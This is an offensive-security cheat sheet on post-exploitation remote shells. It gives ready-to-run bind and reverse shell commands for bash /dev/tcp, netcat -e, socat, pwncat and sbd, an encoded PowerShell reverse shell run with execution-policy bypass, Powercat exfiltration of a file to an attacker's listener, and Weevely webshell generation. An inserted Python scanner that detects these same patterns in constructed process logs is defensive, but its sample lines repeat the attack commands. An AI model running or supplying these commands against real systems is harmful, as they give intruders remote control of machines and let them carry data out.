Once we are able to execute code remotely, whether through a known vulnerability, a SQL injection or a Remote File Inclusion (RFI), it is extremely important to continue into the more advanced post-exploitation phases and spawn a shell.
Direct (bind) shells are used when the compromised machine is directly reachable from the Internet and the firewall allows incoming traffic (INGRESS filtering) to that specific port.
We use reverse shells in most cases, because the compromised machine sits inside a LAN or behind several layers of security. One perk of reverse shells is that firewalls usually do not limit outgoing traffic (EGRESS filtering).
Classic methods to spawn remote shells
bash
How to trigger a bash reverse shell:
On attacker:
nc -nvv -lp 8080
On target:
bash -i >& /dev/tcp/$IP/8080 0>&1
netcat
How to trigger a netcat bindshell:
On target:
nc -nvvlp 8989 -e /bin/bash
On attacker:
nc -nvv $IP 8989
How to trigger a netcat reverse shell:
On attacker:
nc -nvvlp 8989
On target:
nc -nvv $IP 8989 -e /bin/bash
- To improve the shell (Method 1, https://twitter.com/JFaust0/status/1029009593114996736 by @JFaust0): press Ctrl+Z to background the shell, then run on the attacker terminal:
stty raw -echo
fg
reset
- To improve interactive shell (Method 2):
python -c 'import pty; pty.spawn("/bin/bash")'
socat
Syntax:
socat [options] address1 address2
Examples of address:
- - (shorthand for stdio)
- stdio
- tcp4:localhost:1080
- tcp4-listen:8080 = tcp-l:8080
- udp4:host:2049
- udp4-l:500
- exec:/bin/ls,pty
- socks:socks.local:$IP:80
- proxy:proxy.local:$IP:443
- ssl-l:443,cert=./server.pem
- open:file.txt
- create:newfile.txt
- UDP4-DATAGRAM:255.255.255.255:9999,bind=:9999,range=192.168.0.0/24
- TUN:192.168.1.2/24,iff-up=1
How to trigger a bindshell with Socat:
On target:
socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
On attacker:
socat FILE:`tty`,raw,echo=0 TCP:$IP:1337
How to trigger a reverse shell with Socat:
On attacker:
socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0
On target:
socat TCP4:$IP:1337 EXEC:bash,pty,stderr,setsid,sigint,sane
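The defensive counterpart of the bash, netcat and socat recipes above, added here as an example that is not part of the original cheat sheet: a small scanner that flags those exact invocation patterns in process-execution records. The log lines are constructed and their `pid=... uid=... cmdline=...` layout is an assumption, not a real auditd format.

```python
import re
from typing import List, Tuple

# Indicators taken from the shell recipes on this page: bash redirection to
# /dev/tcp, netcat with -e (execute a program), socat EXEC: addresses that
# launch a shell, and the python pty.spawn() upgrade trick.
SHELL_PATTERNS = {
    "bash_dev_tcp": re.compile(r"/dev/(tcp|udp)/[\w.$]+/\d+"),
    "netcat_exec": re.compile(r"\b(nc|ncat|netcat)\b.*\s-[a-zA-Z]*e\s+\S*(sh|bash|cmd|powershell)"),
    "socat_exec": re.compile(r"\bsocat\b.*\bEXEC:(/bin/)?(ba)?sh\b", re.IGNORECASE),
    "pty_spawn": re.compile(r"pty\.spawn\("),
}

# Constructed execve-style records (assumed format: pid=<n> uid=<n> cmdline=<rest of line>).
SAMPLE_EXECVE_LOG = [
    "pid=4242 uid=33 cmdline=bash -i >& /dev/tcp/203.0.113.5/8080 0>&1",
    "pid=4243 uid=33 cmdline=nc -nvv 203.0.113.5 8989 -e /bin/bash",
    "pid=4244 uid=1000 cmdline=socat TCP4:203.0.113.5:1337 EXEC:bash,pty,stderr,setsid,sigint,sane",
    "pid=4245 uid=1000 cmdline=python -c 'import pty; pty.spawn(\"/bin/bash\")'",
    "pid=4246 uid=0 cmdline=nc -zv 10.0.0.7 22",                          # port check, benign
    "pid=4247 uid=0 cmdline=socat tcp4:localhost:1080 exec:/bin/ls,pty",  # exec of a non-shell, benign
]

RECORD_RE = re.compile(r"^pid=(\d+) uid=(\d+) cmdline=(.*)$")


def classify(cmdline: str) -> List[str]:
    """Return the name of every shell-spawning pattern found in one command line."""
    return [name for name, rx in SHELL_PATTERNS.items() if rx.search(cmdline)]


def scan(log_lines: List[str]) -> List[Tuple[str, str, List[str]]]:
    """Parse execve records and return (pid, uid, matched_patterns) for each suspicious one."""
    findings = []
    for line in log_lines:
        m = RECORD_RE.match(line)
        if not m:
            continue  # skip malformed records instead of aborting the scan
        pid, uid, cmdline = m.groups()
        hits = classify(cmdline)
        if hits:
            findings.append((pid, uid, hits))
    return findings


if __name__ == "__main__":
    for pid, uid, hits in scan(SAMPLE_EXECVE_LOG):
        print(f"pid={pid} uid={uid} matched={','.join(hits)}")
```

The two benign records show the precision the patterns aim for: a netcat port check without -e and a socat exec: of a non-shell binary produce no finding.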
pwncat
https://pwncat.readthedocs.io/en/latest/usage.html
https://github.com/cytopia/pwncat
Listener on the attacker:
pwncat -l 4444
Bind shell:
pwncat -l -e '/bin/bash' 8080 -k
Reverse shell:
pwncat -e '/bin/bash' example.com 4444 --reconn --reconn-wait 1
Direct shell with mosh
Mosh allows resilient sessions over low-quality links or to servers with intermittent connectivity.
mosh --ssh="ssh -p 2222" example.org
More info: https://mosh.org/#usage
How to trigger a direct or reverse shell with Msfvenom:
Learn how to spawn remote shells with Metasploit Msfvenom in Msfvenom Payloads Cheat Sheet.
How to trigger a direct or reverse shell with sbd:
Syntax:
connect (tcp): sbd [-options] host port
listen (tcp): sbd -l -p port [-options]
Spawn a bindshell on port 4444 on target:
sbd -l -p 4444 -e bash -v -n
Connect to the bindshell from the attacker:
sbd 192.168.1.202 4444
Build a VPN with socat:
On server:
socat tcp-l:50500 TUN:192.168.10.2/24,iff-up=1
On client:
socat tcp:$SERVER:50500 TUN:192.168.10.3/24,iff-up=1
(replace $SERVER with the address of the listening server; the tcp: address requires host:port)
Windows Powershell Direct shell
Set $LHOST and $LPORT first, then build the encoded command:
$str='$client=New-Object System.Net.Sockets.TCPClient("'+$LHOST+'",'+$LPORT+');$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1|Out-String );$sendback2=$sendback+"PS "+(pwd).Path+"> ";$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
$b=[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
echo "powershell -ep bypass -nop -encodedcommand $b" | clip
Then directly paste (Ctrl+V) in the target terminal.
USB man-in-the-middle
- proxy USB over IP
Remote:
socat /dev/ttyUSB0,raw,echo=0 tcp-listen:1337,reuseaddr
Local:
socat PTY,raw,echo=0,link=/dev/ttyVUSB0 tcp:$TARGET:1337
tsh
Tiny SHell (tsh) is an open-source UNIX backdoor written in C.
Powershell modules
Powercat
Powercat provides netcat functionality in PowerShell with no additional packages required; it is useful for data exfiltration.
In target:
powershell -exec bypass
Import-Module .\powercat.ps1
powercat -c $IP -p 80 -i input.txt
In attacker machine:
nc -vvlp 80 > input.txt
Reference: https://github.com/besimorhino/powercat
Webshells
Weevely
python weevely.py generate AbC /var/www/html/AbC.txt
Learn how to create webshells with Metasploit Msfvenom in Msfvenom payloads Cheat Sheet.